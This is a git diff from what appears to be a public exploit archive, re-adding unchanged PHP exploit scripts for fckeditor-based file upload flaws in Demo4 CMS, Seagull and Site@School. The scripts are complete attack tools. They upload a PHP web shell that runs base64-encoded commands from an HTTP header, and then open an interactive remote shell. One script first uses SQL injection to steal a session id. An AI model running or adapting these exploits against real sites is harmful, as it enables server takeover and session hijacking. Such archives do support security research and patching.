+if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
+else print "\n[-] Shell uploaded...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\nStack-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Connection: close\r\n\r\n";
+  $html   = http_send($host, $packet);
+  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $html);
+  print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5923.pl b/platforms/php/webapps/5923.pl
index a923ab17d..0469d592b 100755
--- a/platforms/php/webapps/5923.pl
+++ b/platforms/php/webapps/5923.pl
@@ -1,136 +1,136 @@
-<?php
-/*
- --------------------------------------------------------------
-      Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
- --------------------------------------------------------------
-   by Stack
-  Special thnx for : Egix
- [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
- 
- 41. // Get the posted file.
- 42. $oFile = $_FILES['NewFile'] ;
- 43.
- 44. // Get the uploaded file name and extension.
- 45. $sFileName = $oFile['name'] ;
- 46. $sOriginalFileName = $sFileName ;
- 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
- 48. $sExtension = strtolower( $sExtension ) ;
- 49.
- 50. // The the file type (from the QueryString, by default 'File').
- 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
- 52.
- 53. // Check if it is an allowed type.
- 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
- 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
- 56.
- 57. // Get the allowed and denied extensions arrays.
- 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
- 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
- 60.
- 61. // Check if it is an allowed extension.
- 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
- 63.  SendResults( '202' ) ;
- 64.
- 65. $sErrorNumber = '0' ;
- 66. $sFileUrl  = '' ;
- 67.
- 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
- 69. $iCounter = 0 ;
- 70.
- 71. // The the target directory.
- 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
- 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
- 74. else
- 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
- 76.  $sServerDir = $Config["UserFilesPath"] ;
- 77.
- 78. while ( true )
- 79. {
- 80.  // Compose the file path.
- 81.  $sFilePath = $sServerDir . $sFileName ;
- 82.
- 83.  // If a file with that name already exists.
- 84.  if ( is_file( $sFilePath ) )
- 85.  {
- 86.   $iCounter++ ;
- 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
- 88.   $sErrorNumber = '201' ;
- 89.  }
- 90.  else
- 91.  {
- 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
- 93.
- 94.   if ( is_file( $sFilePath ) )
- 95.   {
- 96.    $oldumask = umask(0) ;
- 97.    chmod( $sFilePath, 0777 ) ;
- 98.    umask( $oldumask ) ;
- 99.   }
- 100. 
- 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
- 102.
- 103.   break ;
- 
-*/
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
-  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-print "\n+------------------------------------------------------------+";
-print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
-print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
-{
- print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
- die();
-}
-$host = $argv[1];
-$path = $argv[2];
-$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
-while(1)
-{
- print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
- }
- else break;
-}
-?>
-
-# milw0rm.com [2008-06-23]
+<?php
+/*
+ --------------------------------------------------------------
+      Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
+ --------------------------------------------------------------
+   by Stack
+  Special thnx for : Egix
+ [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
+ 
+ 41. // Get the posted file.
+ 42. $oFile = $_FILES['NewFile'] ;
+ 43.
+ 44. // Get the uploaded file name and extension.
+ 45. $sFileName = $oFile['name'] ;
+ 46. $sOriginalFileName = $sFileName ;
+ 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+ 48. $sExtension = strtolower( $sExtension ) ;
+ 49.
+ 50. // The the file type (from the QueryString, by default 'File').
+ 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+ 52.
+ 53. // Check if it is an allowed type.
+ 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+ 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
+ 56.
+ 57. // Get the allowed and denied extensions arrays.
+ 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
+ 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
+ 60.
+ 61. // Check if it is an allowed extension.
+ 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+ 63.  SendResults( '202' ) ;
+ 64.
+ 65. $sErrorNumber = '0' ;
+ 66. $sFileUrl  = '' ;
+ 67.
+ 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
+ 69. $iCounter = 0 ;
+ 70.
+ 71. // The the target directory.
+ 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
+ 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
+ 74. else
+ 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+ 76.  $sServerDir = $Config["UserFilesPath"] ;
+ 77.
+ 78. while ( true )
+ 79. {
+ 80.  // Compose the file path.
+ 81.  $sFilePath = $sServerDir . $sFileName ;
+ 82.
+ 83.  // If a file with that name already exists.
+ 84.  if ( is_file( $sFilePath ) )
+ 85.  {
+ 86.   $iCounter++ ;
+ 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+ 88.   $sErrorNumber = '201' ;
+ 89.  }
+ 90.  else
+ 91.  {
+ 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+ 93.
+ 94.   if ( is_file( $sFilePath ) )
+ 95.   {
+ 96.    $oldumask = umask(0) ;
+ 97.    chmod( $sFilePath, 0777 ) ;
+ 98.    umask( $oldumask ) ;
+ 99.   }
+ 100. 
+ 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+ 102.
+ 103.   break ;
+ 
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+print "\n+------------------------------------------------------------+";
+print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
+print "\n+------------------------------------------------------------+\n";
+if ($argc < 2)
+{
+ print "\nUsage......: php $argv[0] host path";
+ print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+$data  = "--12345\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "--12345--\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\nstack-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Connection: close\r\n\r\n";
+  $output = http_send($host, $packet);
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $output);
+  print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5945.txt b/platforms/php/webapps/5945.txt
index d143ea00b..842e0bdfd 100755
--- a/platforms/php/webapps/5945.txt
+++ b/platforms/php/webapps/5945.txt
@@ -1,117 +1,117 @@
-<?php
-
-/*
-	------------------------------------------------------------------------
-	Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
-	------------------------------------------------------------------------
-	
-	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
-	
-	link.....: http://seagullproject.org/
-	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
-
-	[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
-	
-	33.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
-	34.	$Config['Enabled'] = true ;
-	35.	
-	36.	// Path to user files relative to the document root.
-	37.	$Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
-	38.	
-	39.	// Fill the following value it you prefer to specify the absolute path for the
-	40.	// user files directory. Usefull if you are using a virtual directory, symbolic
-	41.	// link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
-	42.	// Attention: The above 'UserFilesPath' must point to the same directory.
-	43.	$Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
-	44.	
-	45.	$Config['AllowedExtensions']['File']    = array() ;
-	46.	$Config['DeniedExtensions']['File']     = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
-	47.	
-	48.	$Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;
-	49.	$Config['DeniedExtensions']['Image']    = array() ;
-	50.	
-	51.	$Config['AllowedExtensions']['Flash']   = array('swf','fla') ;
-	52.	$Config['DeniedExtensions']['Flash']    = array() ;
-	53.	
-	54.	$Config['AllowedExtensions']['Media']   = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
-	55.	$Config['DeniedExtensions']['Media']    = array() ;
-	
-	with a default configuration of this script, an attacker might be able to upload arbitrary
-	files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-print "\n+--------------------------------------------------------------------+";
-print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
-print "\n+--------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path\n";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /seagull/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-$filename  = md5(time()).".php.php4";
-$connector = "tinyfck/filemanager/connectors/php/connector.php";
-
-$payload  = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
-$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-$payload .= "--o0oOo0o--\r\n";
-
-$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
-
-preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-
-while(1)
-{
-	print "\nseagull-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
-		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
-		$shell  = explode("_code_", $output);
-		print "\n{$shell[1]}";
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-06-26]
+<?php
+
+/*
+	------------------------------------------------------------------------
+	Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
+	------------------------------------------------------------------------
+	
+	author...: EgiX
+	mail.....: n0b0d13s[at]gmail[dot]com
+	
+	link.....: http://seagullproject.org/
+	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+
+	[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
+	
+	33.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
+	34.	$Config['Enabled'] = true ;
+	35.	
+	36.	// Path to user files relative to the document root.
+	37.	$Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
+	38.	
+	39.	// Fill the following value it you prefer to specify the absolute path for the
+	40.	// user files directory. Usefull if you are using a virtual directory, symbolic
+	41.	// link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
+	42.	// Attention: The above 'UserFilesPath' must point to the same directory.
+	43.	$Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
+	44.	
+	45.	$Config['AllowedExtensions']['File']    = array() ;
+	46.	$Config['DeniedExtensions']['File']     = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
+	47.	
+	48.	$Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;
+	49.	$Config['DeniedExtensions']['Image']    = array() ;
+	50.	
+	51.	$Config['AllowedExtensions']['Flash']   = array('swf','fla') ;
+	52.	$Config['DeniedExtensions']['Flash']    = array() ;
+	53.	
+	54.	$Config['AllowedExtensions']['Media']   = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
+	55.	$Config['DeniedExtensions']['Media']    = array() ;
+	
+	with a default configuration of this script, an attacker might be able to upload arbitrary
+	files containing malicious PHP code due to multiple file extensions isn't properly checked
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+define(STDIN, fopen("php://stdin", "r"));
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+print "\n+--------------------------------------------------------------------+";
+print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
+print "\n+--------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path\n";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /seagull/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+$filename  = md5(time()).".php.php4";
+$connector = "tinyfck/filemanager/connectors/php/connector.php";
+
+$payload  = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
+$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+
+preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+
+while(1)
+{
+	print "\nseagull-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
+		$packet.= "Host: {$host}\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Connection: close\r\n\r\n";
+		$output = http_send($host, $packet);
+		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
+		$shell  = explode("_code_", $output);
+		print "\n{$shell[1]}";
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/6005.php b/platforms/php/webapps/6005.php
index 45f24b2c7..424ab0782 100755
--- a/platforms/php/webapps/6005.php
+++ b/platforms/php/webapps/6005.php
@@ -1,194 +1,194 @@
-<?php
-
-/*
-	-------------------------------------------------------------------------
-	Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
-	-------------------------------------------------------------------------
-	
-	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
-	
-	link.....: http://siteatschool.sourceforge.net/
-	details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
-	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
-	
-	[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
-	
-	63.	$query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
-	64.	if ($result = mysql_query($query))
-	65.	{
-	66.		$check_sessioncode = mysql_result($result, 0);
-	67.		unset ($query);
-	68.		unset ($result);
-	69.	}
-	70.	if ($_SESSION['sessioncode'] != $check_sessioncode)
-	71.	{
-	72.		//if we don't have a session present the login screen
-	73.		Header("Location: ../../../../../index.php");
-	74.		exit;
-	75.	}
-	
-	[...]
-	
-	117.	if ($option == "upload")
-	118.	{
-	119.		if (IsSet ($_FILES["new_file"]["name"]))
-	120.		{
-	121.			$file_name = $_FILES["new_file"]["name"];
-	122.		}
-	123.		if (IsSet ($_SESSION['opendir']))
-	124.		{
-	125.			$write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
-	126.			// moveupload the file to $write_path, function is in core/common.inc.php
-	127.			$temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.	
-	128.			sas_move_uploaded_file($write_path, $file_name, $temp_file);
-	129.		}
-	130.		$opendir = $_SESSION['opendir']; //for returning to the directory were we came from	
-	131.	}
-	
-	an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
-	(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
-*/
-
-error_reporting(0);
-ini_set("default_socket_timeout",5);
-set_time_limit(0);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...\n";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-function upload()
-{
-	global $host, $path, $sid;
-	
-	$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
-	
-	$packet  = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Cookie: PHPSESSID={$sid}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-	
-	http_send($host, $packet);
-	
-	foreach ($file_ext as $ext)
-	{
-		print "\n[-] Trying to upload with {$ext} extension...";
-		
-		$payload  = "--o0oOo0o\r\n";
-		$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
-		$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
-		$payload .= "--o0oOo0o--\r\n";
-
-		$packet  = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
-		$packet .= "Cookie: PHPSESSID={$sid}\r\n";
-		$packet .= "Content-Length: ".strlen($payload)."\r\n";
-		$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-		$packet .= "Connection: close\r\n\r\n";
-		$packet .= $payload;
-
-		if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
-		
-		$packet  = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
-		$packet .= "Connection: close\r\n\r\n";
-		$html    = http_send($host, $packet);
-		
-		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-		
-		sleep(1);
-	}
-	
-	return false;
-}
-
-function get_sid()
-{
-	global $host, $path, $prefix;
-	
-	// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
-	$sql =  "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
-		"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
-
-	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-
-	$pieces = explode(chr(0xFF), http_send($host, $packet));
-	return $pieces[1];
-}
-
-function check_target()
-{
-	global $host, $path, $prefix;
-	
-	print "\n[-] Checking {$host}...";
-	
-	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-	
-	if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
-	else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
-	
-	$prefix = $match[1];
-}
-
-print "\n+-----------------------------------------------------------------------+";
-print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
-print "\n+-----------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage...: php $argv[0] host path \n";
-	print "\nhost....: target server (ip/hostname)";
-	print "\npath....: path to sas directory\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-check_target();
-$sid = get_sid();
-
-if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
-else print "\n[-] Hijacking with sid {$sid}\n";
-
-if (!($ext = upload())) die("\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
-
-while(1)
-{
-	print "\nsas-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
-		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
-		$shell  = explode("_code_", $output);
-		print "\n{$shell[1]}";
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-07-04]
+<?php
+
+/*
+	-------------------------------------------------------------------------
+	Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
+	-------------------------------------------------------------------------
+	
+	author...: EgiX
+	mail.....: n0b0d13s[at]gmail[dot]com
+	
+	link.....: http://siteatschool.sourceforge.net/
+	details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
+	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+	
+	[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
+	
+	63.	$query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
+	64.	if ($result = mysql_query($query))
+	65.	{
+	66.		$check_sessioncode = mysql_result($result, 0);
+	67.		unset ($query);
+	68.		unset ($result);
+	69.	}
+	70.	if ($_SESSION['sessioncode'] != $check_sessioncode)
+	71.	{
+	72.		//if we don't have a session present the login screen
+	73.		Header("Location: ../../../../../index.php");
+	74.		exit;
+	75.	}
+	
+	[...]
+	
+	117.	if ($option == "upload")
+	118.	{
+	119.		if (IsSet ($_FILES["new_file"]["name"]))
+	120.		{
+	121.			$file_name = $_FILES["new_file"]["name"];
+	122.		}
+	123.		if (IsSet ($_SESSION['opendir']))
+	124.		{
+	125.			$write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
+	126.			// moveupload the file to $write_path, function is in core/common.inc.php
+	127.			$temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.	
+	128.			sas_move_uploaded_file($write_path, $file_name, $temp_file);
+	129.		}
+	130.		$opendir = $_SESSION['opendir']; //for returning to the directory were we came from	
+	131.	}
+	
+	an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
+	(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
+*/
+
+error_reporting(0);
+ini_set("default_socket_timeout",5);
+set_time_limit(0);
+
+define(STDIN, fopen("php://stdin", "r"));
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...\n";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+function upload()
+{
+	global $host, $path, $sid;
+	
+	$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
+	
+	$packet  = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Cookie: PHPSESSID={$sid}\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+	
+	http_send($host, $packet);
+	
+	foreach ($file_ext as $ext)
+	{
+		print "\n[-] Trying to upload with {$ext} extension...";
+		
+		$payload  = "--o0oOo0o\r\n";
